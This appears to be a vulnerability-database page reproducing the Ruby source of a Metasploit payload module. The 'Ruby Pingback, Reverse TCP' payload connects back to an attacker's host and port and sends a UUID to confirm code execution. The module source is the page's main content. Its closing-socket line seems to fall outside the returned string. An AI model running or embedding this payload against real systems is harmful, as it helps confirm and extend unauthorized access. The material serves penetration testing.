Lucene search

Ruby Pingback, Reverse TCP

🗓️ 26 Jul 2019 00:50:42Reported by asoto-r7Type

Ruby Pingback, Reverse TCP payload for Metasploi

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability


module MetasploitModule

  CachedSize = 100

  include Msf::Payload::Single
  include Msf::Payload::Ruby
  include Msf::Payload::Pingback
  include Msf::Payload::Pingback::Options

  def initialize(info = {})
    super(merge_info(info,
      'Name' => 'Ruby Pingback, Reverse TCP',
      'Description' => 'Connect back to the attacker, sends a UUID, then terminates',
      'Author' => 'asoto-r7',
      'License' => MSF_LICENSE,
      'Platform' => 'ruby',
      'Arch' => ARCH_RUBY,
      'Handler' => Msf::Handler::ReverseTcp,
      'Session' => Msf::Sessions::Pingback,
      'PayloadType' => 'ruby'
    ))
  end

  def generate(_opts = {})
    # return prepends(ruby_string)
    return ruby_string
  end

  def ruby_string
    self.pingback_uuid ||= self.generate_pingback_uuid
    lhost = datastore['LHOST']
    lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
    return "require'socket';" \
      "c=TCPSocket.new'#{lhost}',#{datastore['LPORT'].to_i};" \
      "c.puts'#{[[self.pingback_uuid].pack('H*')].pack('m0')}'.unpack('m0');"
      "c.close"
  end
end

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

26 Jul 2019 00:42Current

7.2High risk

Vulners AI Score7.2